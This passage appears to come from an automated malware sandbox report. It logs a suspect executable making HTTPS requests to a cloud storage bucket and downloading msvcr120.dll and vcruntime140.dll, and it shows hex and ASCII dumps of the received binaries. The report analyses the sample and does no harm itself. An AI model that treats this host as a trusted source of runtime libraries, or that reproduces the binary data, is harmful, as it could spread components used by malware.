                                                                            2024-07-25 14:04:30 UTC16384INData Raw: 8b 4c 31 38 e8 93 f9 ff ff 0f b7 c0 8b c8 b8 ff ff 00 00 66 3b c1 75 20 8b 06 8b 48 04 03 ce 8b 41 0c 83 c8 01 83 79 38 00 75 03 83 c8 04 6a 00 50 e8 3f ed ff ff eb 4a 8b 07 51 6a 48 8b cf ff 50 10 84 c0 74 3c 8b 06 8b 40 04 8b 4c 30 38 e8 6b f9 ff ff eb b3 8b 4d ec 8b 01 8b 50 04 03 d1 8b 42 0c 83 c8 04 83 7a 38 00 75 03 83 c8 04 6a 01 50 8b ca e8 fc ec ff ff b8 7b 0a 01 10 c3 8b 75 ec 83 4d fc ff 8b 0e 8b 49 04 03 ce 83 79 0c 00 75 04 b0 01 eb 19 8b 41 0c 83 c8 02 83 79 38 00 75 03 83 c8 04 6a 00 50 e8 c7 ec ff ff 32 c0 e8 8f a8 02 00 c2 04 00 55 8b ec 53 8b 5d 08 56 53 8b f1 e8 7f 01 00 00 84 c0 74 1c 83 7e 14 10 72 04 8b 06 eb 02 8b c6 ff 75 0c 2b d8 8b ce 53 56 e8 b9 fa ff ff eb 43 57 8b 7d 0c 8b ce 6a 00 57 e8 ed 00 00 00 84 c0 74 2e 83 7e 14 10 72
                                                                            Data Ascii: L18f;u HAy8ujP?JQjHPt<@L08kMPBz8ujP{uMIyuAy8ujP2US]VSt~ru+SVCW}jWt.~r
                                                                            2024-07-25 14:04:30 UTC16352INData Raw: 85 db 74 12 53 ff 75 08 ff 75 f0 e8 f4 68 02 00 8b 4d fc 83 c4 0c 01 5d 08 03 cb 8b 55 f8 13 55 10 2b f3 89 55 f8 8b 55 f4 1b 7d 10 8b 42 30 29 18 8b 42 20 01 18 eb 28 8b 4d f4 8b 5d 08 8b 11 0f b6 03 50 ff 52 0c 83 f8 ff 74 2c 8b 4d fc 43 83 c1 01 89 5d 08 83 55 f8 00 83 c6 ff 83 d7 ff 8b 5d f4 89 4d fc 85 ff 0f 8f 5c ff ff ff 7c 08 85 f6 0f 85 52 ff ff ff 8b 4d fc 8b 55 f8 5e 5f 8b c1 5b 8b e5 5d c2 0c 00 6a 08 b8 1a d2 03 10 e8 e1 68 02 00 8b f1 89 75 ec 33 d2 89 55 f0 39 55 10 74 17 c7 06 ec 1c 00 10 c7 46 18 24 1c 00 10 89 55 fc c7 45 f0 01 00 00 00 8b 06 ff 75 0c ff 75 08 8b 40 04 c7 04 06 e8 1c 00 10 8b 06 8b 48 04 8d 41 e8 89 44 31 fc 8b 06 89 56 08 89 56 0c 8b 48 04 03 ce e8 bd f6 ff ff 8b c6 e8 52 68 02 00 c2 0c 00 8b 41 e8 8b 40 04 c7 44 08 e8
                                                                            Data Ascii: tSuuhM]UU+UU}B0)B (M]PRt,MC]U]M\|RMU^_[]jhu3U9UtF$UEuu@HAD1VVHRhA@D
                                                                            2024-07-25 14:04:30 UTC16384INData Raw: 6a 6f ff ff 50 c6 45 fc 02 e8 85 ce ff ff 59 8d 4d e0 8b d8 e8 3c 5a ff ff 8b 0e 8d 55 e4 8b 03 52 8d 55 ec c6 45 d4 01 8b 49 04 52 03 ce c6 45 fc 03 51 ff 75 d4 83 79 38 00 57 0f 94 45 cc ff 75 cc ff 71 38 8d 4d c8 51 8b cb ff 50 28 eb 30 8b 4d e8 33 ff 8b 01 8b 50 04 03 d1 8b 42 0c 83 c8 04 39 7a 38 75 03 83 c8 04 83 e0 17 89 42 0c 85 42 10 75 37 b8 57 8a 01 10 c3 8b 75 e8 33 ff 8b 4d ec c7 45 fc 01 00 00 00 f6 c1 02 75 15 8b 55 e4 8d 82 00 00 00 80 83 f8 ff 77 07 8b 45 08 89 10 eb 12 83 c9 02 89 4d ec eb 0a 57 57 e8 ab 28 02 00 8b 4d ec 8b 06 57 51 8b 48 04 03 ce e8 58 78 ff ff 8b 06 83 4d fc ff 8b 40 04 8b 4c 30 38 85 c9 74 05 8b 01 ff 50 08 8b c6 e8 83 28 02 00 c2 04 00 6a 28 b8 a1 d6 03 10 e8 0f 29 02 00 8b f1 89 75 ec 33 ff 89 75 dc 89 7d e8 8b 06
                                                                            Data Ascii: joPEYM<ZURUEIREQuy8WEuq8MQP(0M3PB9z8uBBu7Wu3MEuUwEMWW(MWQHXxM@L08tP(j()u3u}


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.44973343.153.232.1514437328C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-25 14:04:32 UTC135OUTGET /msvcr120.dll HTTP/1.1
                                                                            User-Agent: Mozilla/5.0
                                                                            Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com
                                                                            Cache-Control: no-cache
                                                                            2024-07-25 14:04:33 UTC472INHTTP/1.1 200 OK
                                                                            Content-Type: application/x-msdownload
                                                                            Content-Length: 970912
                                                                            Connection: close
                                                                            Accept-Ranges: bytes
                                                                            Content-Disposition: attachment
                                                                            Date: Thu, 25 Jul 2024 14:04:33 GMT
                                                                            ETag: "034ccadc1c073e4216e9466b720f9849"
                                                                            Last-Modified: Mon, 18 Mar 2024 00:32:34 GMT
                                                                            Server: tencent-cos
                                                                            x-cos-force-download: true
                                                                            x-cos-hash-crc64ecma: 3551019292791871068
                                                                            x-cos-request-id: NjZhMjViNzBfOGRiMjQ4MGJfMTc5Ml82NTdmM2Q=
                                                                            x-cos-server-side-encryption: AES256
                                                                            2024-07-25 14:04:33 UTC7732INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 53 39 02 12 17 58 6c 41 17 58 6c 41 17 58 6c 41 ca a7 a7 41 14 58 6c 41 17 58 6d 41 a7 58 6c 41 51 09 8c 41 b9 5a 6c 41 51 09 b3 41 76 58 6c 41 51 09 89 41 21 58 6c 41 51 09 8d 41 af 58 6c 41 51 09 b0 41 16 58 6c 41 51 09 b7 41 16 58 6c 41 51 09 b2 41 16 58 6c 41 52 69 63 68 17 58 6c 41 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e6 7c 4f 52 00 00 00 00 00 00 00 00 e0 00 22
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$S9XlAXlAXlAAXlAXmAXlAQAZlAQAvXlAQA!XlAQAXlAQAXlAQAXlAQAXlARichXlAPEL|OR"
                                                                            2024-07-25 14:04:34 UTC16384INData Raw: af 53 03 00 65 57 03 00 27 1f 0c 00 1f 76 0a 00 c4 b7 0a 00 46 e3 07 00 65 e3 07 00 d7 b3 07 00 84 3d 0a 00 49 15 03 00 12 03 0a 00 0f 2f 08 00 b1 2f 08 00 05 c1 02 00 27 e2 07 00 85 57 03 00 d2 7b 01 00 9c 33 08 00 5c ce 02 00 bf 3d 0a 00 63 89 08 00 46 e2 07 00 e4 34 08 00 ad 35 08 00 69 36 08 00 90 35 08 00 e5 38 08 00 04 39 08 00 86 36 08 00 a7 36 08 00 c9 36 08 00 ea 36 08 00 2b 44 03 00 7a 37 08 00 bd 25 03 00 7a 3a 08 00 97 37 08 00 b8 37 08 00 da 37 08 00 fb 37 08 00 e4 1a 0a 00 4a 1c 0a 00 6c 02 08 00 b0 02 08 00 00 03 08 00 42 03 08 00 92 03 08 00 d9 03 08 00 38 06 08 00 50 06 08 00 81 76 0a 00 d4 78 0a 00 24 39 08 00 3e 39 08 00 5a 39 08 00 77 39 08 00 94 39 08 00 b3 39 08 00 d1 e4 07 00 a3 e5 07 00 17 e5 07 00 5d e5 07 00 37 b8 0a 00 d1 b8 0a
                                                                            Data Ascii: SeW'vFe=I//'W{3\=cF45i65896666+Dz7%z:7777JlB8Pvx$9>9Z9w999]7
                                                                            2024-07-25 14:04:34 UTC8168INData Raw: 6c 6c 65 63 74 69 6f 6e 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 51 41 45 40 58 5a 00 3f 3f 30 5f 54 69 6d 65 72 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 49 41 45 40 49 5f 4e 40 5a 00 3f 3f 30 5f 5f 6e 6f 6e 5f 72 74 74 69 5f 6f 62 6a 65 63 74 40 73 74 64 40 40 51 41 45 40 41 42 56 30 31 40 40 5a 00 3f 3f 30 5f 5f 6e 6f 6e 5f 72 74 74 69 5f 6f 62 6a 65 63 74 40 73 74 64 40 40 51 41 45 40 50 42 44 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 41 41 45 40 50 42 51 42 44 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 51 41 45 40 41 42 56 30 31 40 40 5a 00 3f 3f 30 62 61 64 5f 63 61 73 74 40 73 74 64 40 40 51 41 45 40 50 42 44 40 5a 00 3f 3f 30 62 61 64 5f 74 61 72 67 65 74 40 43 6f
                                                                            Data Ascii: llection@details@Concurrency@@QAE@XZ??0_Timer@details@Concurrency@@IAE@I_N@Z??0__non_rtti_object@std@@QAE@ABV01@@Z??0__non_rtti_object@std@@QAE@PBD@Z??0bad_cast@std@@AAE@PBQBD@Z??0bad_cast@std@@QAE@ABV01@@Z??0bad_cast@std@@QAE@PBD@Z??0bad_target@Co
                                                                            2024-07-25 14:04:34 UTC8184INData Raw: 53 70 69 6e 57 61 69 74 40 24 30 41 40 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 49 41 45 58 58 5a 00 3f 5f 47 65 74 40 5f 43 75 72 72 65 6e 74 53 63 68 65 64 75 6c 65 72 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 53 41 3f 41 56 5f 53 63 68 65 64 75 6c 65 72 40 32 33 40 58 5a 00 3f 5f 47 65 74 43 6f 6e 63 52 54 54 72 61 63 65 49 6e 66 6f 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 59 41 50 42 55 5f 43 4f 4e 43 52 54 5f 54 52 41 43 45 5f 49 4e 46 4f 40 64 65 74 61 69 6c 73 40 31 40 58 5a 00 3f 5f 47 65 74 43 6f 6e 63 75 72 72 65 6e 63 79 40 64 65 74 61 69 6c 73 40 43 6f 6e 63 75 72 72 65 6e 63 79 40 40 59 41 49 58 5a 00 3f 5f 47 65 74 43 75 72 72 65 6e 74 49 6e 6c 69 6e 65 44 65 70 74 68 40 5f 53 74 61 63 6b 47
                                                                            Data Ascii: SpinWait@$0A@@details@Concurrency@@IAEXXZ?_Get@_CurrentScheduler@details@Concurrency@@SA?AV_Scheduler@23@XZ?_GetConcRTTraceInfo@Concurrency@@YAPBU_CONCRT_TRACE_INFO@details@1@XZ?_GetConcurrency@details@Concurrency@@YAIXZ?_GetCurrentInlineDepth@_StackG
                                                                            2024-07-25 14:04:34 UTC8184INData Raw: 74 5f 74 6c 73 69 6e 64 65 78 00 5f 5f 67 65 74 6d 61 69 6e 61 72 67 73 00 5f 5f 69 6e 69 74 65 6e 76 00 5f 5f 69 6f 62 5f 66 75 6e 63 00 5f 5f 69 73 61 73 63 69 69 00 5f 5f 69 73 63 73 79 6d 00 5f 5f 69 73 63 73 79 6d 66 00 5f 5f 69 73 77 63 73 79 6d 00 5f 5f 69 73 77 63 73 79 6d 66 00 5f 5f 6c 63 6f 6e 76 00 5f 5f 6c 63 6f 6e 76 5f 69 6e 69 74 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 63 6f 73 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 63 6f 73 66 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 73 69 6e 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 73 69 6e 66 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 74 61 6e 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 74 61 6e 32 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 61 74 61 6e 66 00 5f 5f 6c 69 62 6d 5f 73 73 65 32 5f 63 6f 73
                                                                            Data Ascii: t_tlsindex__getmainargs__initenv__iob_func__isascii__iscsym__iscsymf__iswcsym__iswcsymf__lconv__lconv_init__libm_sse2_acos__libm_sse2_acosf__libm_sse2_asin__libm_sse2_asinf__libm_sse2_atan__libm_sse2_atan2__libm_sse2_atanf__libm_sse2_cos
                                                                            2024-07-25 14:04:34 UTC8184INData Raw: 6f 63 5f 63 72 74 5f 6d 61 78 5f 77 61 69 74 00 5f 73 65 74 5f 6f 75 74 70 75 74 5f 66 6f 72 6d 61 74 00 5f 73 65 74 5f 70 72 69 6e 74 66 5f 63 6f 75 6e 74 5f 6f 75 74 70 75 74 00 5f 73 65 74 5f 70 75 72 65 63 61 6c 6c 5f 68 61 6e 64 6c 65 72 00 5f 73 65 74 65 72 72 6f 72 6d 6f 64 65 00 5f 73 65 74 6a 6d 70 00 5f 73 65 74 6a 6d 70 33 00 5f 73 65 74 6d 61 78 73 74 64 69 6f 00 5f 73 65 74 6d 62 63 70 00 5f 73 65 74 6d 6f 64 65 00 5f 73 65 74 73 79 73 74 69 6d 65 00 5f 73 6c 65 65 70 00 5f 73 6e 70 72 69 6e 74 66 00 5f 73 6e 70 72 69 6e 74 66 5f 63 00 5f 73 6e 70 72 69 6e 74 66 5f 63 5f 6c 00 5f 73 6e 70 72 69 6e 74 66 5f 6c 00 5f 73 6e 70 72 69 6e 74 66 5f 73 00 5f 73 6e 70 72 69 6e 74 66 5f 73 5f 6c 00 5f 73 6e 73 63 61 6e 66 00 5f 73 6e 73 63 61 6e 66 5f
                                                                            Data Ascii: oc_crt_max_wait_set_output_format_set_printf_count_output_set_purecall_handler_seterrormode_setjmp_setjmp3_setmaxstdio_setmbcp_setmode_setsystime_sleep_snprintf_snprintf_c_snprintf_c_l_snprintf_l_snprintf_s_snprintf_s_l_snscanf_snscanf_
                                                                            2024-07-25 14:04:34 UTC8184INData Raw: 46 69 6c 65 20 74 6f 6f 20 6c 61 72 67 65 00 90 4e 6f 20 73 70 61 63 65 20 6c 65 66 74 20 6f 6e 20 64 65 76 69 63 65 00 49 6e 76 61 6c 69 64 20 73 65 65 6b 00 90 90 90 52 65 61 64 2d 6f 6e 6c 79 20 66 69 6c 65 20 73 79 73 74 65 6d 00 90 90 54 6f 6f 20 6d 61 6e 79 20 6c 69 6e 6b 73 00 90 42 72 6f 6b 65 6e 20 70 69 70 65 00 44 6f 6d 61 69 6e 20 65 72 72 6f 72 00 90 90 90 52 65 73 75 6c 74 20 74 6f 6f 20 6c 61 72 67 65 00 90 90 90 52 65 73 6f 75 72 63 65 20 64 65 61 64 6c 6f 63 6b 20 61 76 6f 69 64 65 64 00 90 90 46 69 6c 65 6e 61 6d 65 20 74 6f 6f 20 6c 6f 6e 67 00 90 90 4e 6f 20 6c 6f 63 6b 73 20 61 76 61 69 6c 61 62 6c 65 00 90 46 75 6e 63 74 69 6f 6e 20 6e 6f 74 20 69 6d 70 6c 65 6d 65 6e 74 65 64 00 90 90 90 44 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 65
                                                                            Data Ascii: File too largeNo space left on deviceInvalid seekRead-only file systemToo many linksBroken pipeDomain errorResult too largeResource deadlock avoidedFilename too longNo locks availableFunction not implementedDirectory not e
                                                                            2024-07-25 14:04:34 UTC8184INData Raw: 4e 00 4f 00 00 00 90 90 61 00 72 00 2d 00 54 00 4e 00 00 00 65 00 6e 00 2d 00 5a 00 41 00 00 00 65 00 73 00 2d 00 44 00 4f 00 00 00 73 00 72 00 2d 00 42 00 41 00 2d 00 43 00 79 00 72 00 6c 00 00 00 90 90 73 00 6d 00 61 00 2d 00 53 00 45 00 00 00 90 90 61 00 72 00 2d 00 4f 00 4d 00 00 00 65 00 6e 00 2d 00 4a 00 4d 00 00 00 65 00 73 00 2d 00 56 00 45 00 00 00 73 00 6d 00 73 00 2d 00 46 00 49 00 00 00 90 90 61 00 72 00 2d 00 59 00 45 00 00 00 65 00 6e 00 2d 00 43 00 42 00 00 00 65 00 73 00 2d 00 43 00 4f 00 00 00 73 00 6d 00 6e 00 2d 00 46 00 49 00 00 00 90 90 61 00 72 00 2d 00 53 00 59 00 00 00 65 00 6e 00 2d 00 42 00 5a 00 00 00 65 00 73 00 2d 00 50 00 45 00 00 00 61 00 72 00 2d 00 4a 00 4f 00 00 00 65 00 6e 00 2d 00 54 00 54 00 00 00 65 00 73 00 2d 00 41
                                                                            Data Ascii: NOar-TNen-ZAes-DOsr-BA-Cyrlsma-SEar-OMen-JMes-VEsms-FIar-YEen-CBes-COsmn-FIar-SYen-BZes-PEar-JOen-TTes-A
                                                                            2024-07-25 14:04:34 UTC8184INData Raw: 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 55 8b ec 8b 55 14 8b 4d 08 56 85 d2 0f 84 5f e5 00 00 85 c9 0f 84 64 e5 00 00 8b 45 0c 85 c0 0f 84 59 e5 00 00 85 d2 0f 84 5b e5 00 00 8b 75 10 85 f6 0f 84 a2 38 04 00 53 8b d9 57 8b f8 83 fa ff 75 1e 2b de 8a 06 88 04 33 46 84 c0 74 03 4f 75 f3 85 ff 5f 5b 0f 84 d5 bf 01 00 33 c0 5e 5d c3 2b f1 8a 04 1e 88 03 43 84 c0 74 06 4f 74 03 4a 75 f0 85 d2 75 db 88 13 eb d7 55 56 57 53 8b ea 33 c0 33 db 33 d2 33 f6 33 ff ff d1 5b 5f 5e 5d c3 55 8b ec 83 ec 18 8b 45 08 8b 55 0c 53 8b 5d 14 56 57 c6 45 ff 00 8b 7b 08 8d 73 10 33 38 c7 45 f4 01 00 00 00 8b 07 83 f8 fe 0f 85 a5 d1 04 00 8b 47 08 8b 4f 0c 03 ce 33 0c 30 ff d2 8b 45 10 f6 40 04 66 0f 85 24 d5 00
                                                                            Data Ascii: L$+AL$+AL$+AL$+UUMV_dEY[u8SWu+3FtOu_[3^]+CtOtJuuUVWS33333[_^]UEUS]VWE{s38EGO30E@f$
                                                                            2024-07-25 14:04:34 UTC8184INData Raw: 8b ec 57 8b f9 8b 47 08 d1 e8 a8 01 75 25 8b 4d 08 8b 41 08 d1 e8 a8 01 74 19 56 8b 71 08 8b 41 08 83 c6 08 83 e6 fa a8 01 0f 85 8a d7 03 00 09 77 08 5e 5f 5d c2 04 00 55 8b ec 83 ec 0c 53 56 8b 75 08 57 8b f9 8b 06 3b 07 0f 84 d7 d8 03 00 8b de 8d 47 20 87 18 8b ce 85 db 0f 85 a6 d8 03 00 57 e8 98 ff ff ff 89 77 1c 8d 57 24 43 8b 02 8b c8 0b cb f0 0f b1 0a 75 f6 a8 04 0f 85 8e d8 03 00 6a 02 5b 8b 02 8b c8 0b cb f0 0f b1 0a 75 f6 83 f8 08 0f 8d 76 d8 03 00 83 66 08 fe 80 7d 0c 00 74 13 8b 46 08 89 47 08 8b 46 04 89 47 04 8b 06 89 07 89 77 1c 5f 5e 5b 8b e5 5d c2 08 00 6a 04 b8 b4 b3 0d 10 e8 ec fe ff ff 8b f9 8b 45 08 8d 77 04 89 07 89 75 08 89 75 f0 83 65 fc 00 85 f6 74 09 6a ff 8b ce e8 c7 fd ff ff 83 4d fc ff 8b 0f 6a 01 56 e8 3d ff ff ff 8b c7 e8 e9
                                                                            Data Ascii: WGu%MAtVqAw^_]USVuW;G WwW$Cuj[uvf}tFGFGw_^[]jEwuuetjMjV=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.44973443.153.232.1514437328C:\Users\user\Desktop\LisectAVT_2403002B_246.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-07-25 14:04:36 UTC139OUTGET /vcruntime140.dll HTTP/1.1
                                                                            User-Agent: Mozilla/5.0
                                                                            Host: wwwdll-1323570959.cos.ap-singapore.myqcloud.com
                                                                            Cache-Control: no-cache
                                                                            2024-07-25 14:04:36 UTC472INHTTP/1.1 200 OK
                                                                            Content-Type: application/x-msdownload
                                                                            Content-Length: 91104
                                                                            Connection: close
                                                                            Accept-Ranges: bytes
                                                                            Content-Disposition: attachment
                                                                            Date: Thu, 25 Jul 2024 14:04:36 GMT
                                                                            ETag: "9c133b18fa9ed96e1aeb2da66e4a4f2b"
                                                                            Last-Modified: Mon, 18 Mar 2024 00:32:34 GMT
                                                                            Server: tencent-cos
                                                                            x-cos-force-download: true
                                                                            x-cos-hash-crc64ecma: 15584681233261869999
                                                                            x-cos-request-id: NjZhMjViNzRfZDBhYzQ4MGJfM2NiNzZfNjg0MTkw
                                                                            x-cos-server-side-encryption: AES256
                                                                            2024-07-25 14:04:36 UTC7732INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 8f b4 8a e1 ee da d9 e1 ee da d9 e1 ee da d9 32 9c db d8 e3 ee da d9 e8 96 49 d9 ea ee da d9 e1 ee db d9 c8 ee da d9 e7 6f d9 d8 f2 ee da d9 e7 6f de d8 f7 ee da d9 e7 6f df d8 fd ee da d9 e7 6f da d8 e0 ee da d9 e7 6f 25 d9 e0 ee da d9 e7 6f d8 d8 e0 ee da d9 52 69 63 68 e1 ee da d9 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 04 73 87 13 00 00 00 00 00 00 00 00 e0 00 22
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$2Iooooo%oRichPELs"
                                                                            2024-07-25 14:04:36 UTC8184INData Raw: c8 28 00 00 1c 00 00 00 2e 72 64 61 74 61 24 73 78 64 61 74 61 00 00 00 e4 28 00 00 b0 00 00 00 2e 72 64 61 74 61 24 76 6f 6c 74 6d 64 00 00 00 94 29 00 00 3c 02 00 00 2e 72 64 61 74 61 24 7a 7a 7a 64 62 67 00 00 00 d0 2b 00 00 13 ce 00 00 2e 74 65 78 74 24 6d 6e 00 00 00 00 e3 f9 00 00 4d 00 00 00 2e 74 65 78 74 24 78 00 30 fa 00 00 10 03 00 00 2e 78 64 61 74 61 24 78 00 00 00 00 40 fd 00 00 14 09 00 00 2e 65 64 61 74 61 00 00 00 10 01 00 94 00 00 00 2e 64 61 74 61 00 00 00 94 10 01 00 b8 00 00 00 2e 64 61 74 61 24 72 00 4c 11 01 00 b4 00 00 00 2e 64 61 74 61 24 72 73 00 00 00 00 00 12 01 00 64 04 00 00 2e 62 73 73 00 00 00 00 00 20 01 00 bc 00 00 00 2e 69 64 61 74 61 24 35 00 00 00 00 bc 20 01 00 08 00 00 00 2e 30 30 63 66 67 00 00 c4 20 01 00 78 00 00
                                                                            Data Ascii: (.rdata$sxdata(.rdata$voltmd)<.rdata$zzzdbg+.text$mnM.text$x0.xdata$x@.edata.data.data$rL.data$rsd.bss .idata$5 .00cfg x
                                                                            2024-07-25 14:04:36 UTC8184INData Raw: 00 00 00 0f b6 c8 0f b6 42 14 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 9b 05 00 00 0f b6 4e 15 0f b6 42 15 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 79 05 00 00 0f b6 4e 16 0f b6 42 16 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 57 05 00 00 0f b6 4e 17 0f b6 42 17 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 35 05 00 00 8b 46 18 3b 42 18 0f 84 87 00 00 00 0f b6 c8 0f b6 42 18 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 08 05 00 00 0f b6 4e 19 0f b6 42 19 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 e6 04 00 00 0f b6 4e 1a 0f b6 42 1a 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 c4 04 00 00 0f b6 4e 1b
                                                                            Data Ascii: B+t3ENB+t3EyNB+t3EWNB+t3E5F;BB+t3ENB+t3ENB+t3EN
                                                                            2024-07-25 14:04:36 UTC8184INData Raw: a4 85 00 00 57 ff 75 14 ff 75 0c e8 12 06 00 00 57 e8 c2 07 00 00 83 c4 10 50 e8 79 05 00 00 cc 55 8b ec 83 ec 38 53 8b 5d 08 81 3b 03 00 00 80 0f 84 17 01 00 00 56 57 e8 17 16 00 00 33 ff 39 78 08 74 46 57 ff 15 48 20 01 10 8b f0 e8 02 16 00 00 39 70 08 74 33 81 3b 4d 4f 43 e0 74 2b 81 3b 52 43 43 e0 74 23 ff 75 24 ff 75 20 ff 75 18 ff 75 14 ff 75 10 ff 75 0c 53 e8 19 84 00 00 83 c4 1c 85 c0 0f 85 c1 00 00 00 8b 45 18 89 45 ec 89 7d f0 39 78 0c 0f 86 b4 00 00 00 ff 75 20 50 ff 75 14 8d 45 ec ff 75 1c 50 8d 45 dc 50 e8 18 83 00 00 8b 55 e0 83 c4 18 8b 45 dc 89 45 f4 89 55 fc 3b 55 e8 0f 83 80 00 00 00 6b ca 14 89 4d f8 8b 00 8d 7d c8 6a 05 8b 70 10 8b 45 1c 03 f1 59 f3 a5 39 45 c8 7f 4e 3b 45 cc 7f 49 8b 4d d4 8b 45 d8 c1 e1 04 83 c0 f0 03 c1 8b 48 04 85
                                                                            Data Ascii: WuuWPyU8S];VW39xtFWH 9pt3;MOCt+;RCCt#u$u uuuuSEE}9xu PuEuPEPUEEU;UkM}jpEY9EN;EIMEH
                                                                            2024-07-25 14:04:36 UTC8184INData Raw: 03 eb 03 83 26 00 8b c6 5e 5d c2 04 00 55 8b ec 8b 55 0c 83 fa 09 77 20 83 39 ff 74 17 3b 11 7f 13 8b 54 91 04 8b 45 08 8b 0a 89 08 8b 4a 04 89 48 04 eb 11 6a 02 eb 02 6a 03 8b 4d 08 e8 70 fd ff ff 8b 45 08 5d c2 08 00 55 8b ec 51 51 ff 75 0c 8d 4d f8 e8 e9 fc ff ff ff 75 10 8b c8 ff 75 08 e8 74 00 00 00 8b 45 08 c9 c3 55 8b ec 51 51 ff 75 0c 83 65 f8 00 8d 4d f8 83 65 fc 00 e8 42 10 00 00 ff 75 10 8d 4d f8 ff 75 08 e8 49 00 00 00 8b 45 08 c9 c3 55 8b ec 51 51 ff 75 0c 8d 4d f8 e8 0c fd ff ff ff 75 10 8b c8 ff 75 08 e8 27 00 00 00 8b 45 08 c9 c3 55 8b ec 8b 11 56 8b 75 08 ff 75 0c 89 16 8b 49 04 89 4e 04 8b ce e8 6d 00 00 00 8b c6 5e 5d c2 08 00 55 8b ec 8b 11 56 8b 75 08 ff 75 0c 89 16 8b 49 04 89 4e 04 8b ce e8 a3 00 00 00 8b c6 5e 5d c2 08 00 55 8b ec
                                                                            Data Ascii: &^]UUw 9t;TEJHjjMpE]UQQuMuutEUQQueMeBuMuIEUQQuMuu'EUVuuINm^]UVuuIN^]U
                                                                            2024-07-25 14:04:36 UTC16384INData Raw: ff ff eb 30 6a 08 b9 1c 13 01 10 e8 1f 14 00 00 8b f0 85 f6 74 13 8b ce e8 cb de ff ff c7 06 44 22 00 10 c6 46 04 20 eb 02 33 f6 56 8d 4d dc e8 bd da ff ff 8d 45 c8 50 8d 45 d0 50 8d 4d dc e8 9e e0 ff ff 8b 08 8b 58 04 89 4d f4 89 5d f8 8b 4d b8 85 c9 74 2e 8b 45 bc 89 4d c0 8d 4d c0 6a 20 89 45 c4 e8 8e e1 ff ff 8d 45 f4 50 8d 45 d0 50 8d 4d c0 e8 69 e0 ff ff 8b 08 8b 58 04 89 4d f4 89 5d f8 8b 45 d8 a8 10 0f 84 f5 00 00 00 83 7d 18 00 0f 85 69 03 00 00 85 ff 0f 8e 89 00 00 00 8d 45 e8 c7 45 e8 fc 1d 00 10 50 8d 4d d0 c7 45 ec 02 00 00 00 e8 8f dc ff ff 8d 4d f4 51 8d 4d e8 51 8b c8 e8 18 e0 ff ff 8b 45 e8 89 45 f4 8b 45 ec 89 45 f8 a1 00 13 01 10 80 38 00 74 23 8d 45 d0 50 e8 08 24 00 00 59 8d 4d f4 51 8d 4d a8 51 8b c8 e8 e9 df ff ff 8b 08 8b 58 04 89
                                                                            Data Ascii: 0jtD"F 3VMEPEPMXM]Mt.EMMj EEPEPMiXM]E}iEEPMEMQMQEEEE8t#EP$YMQMQX
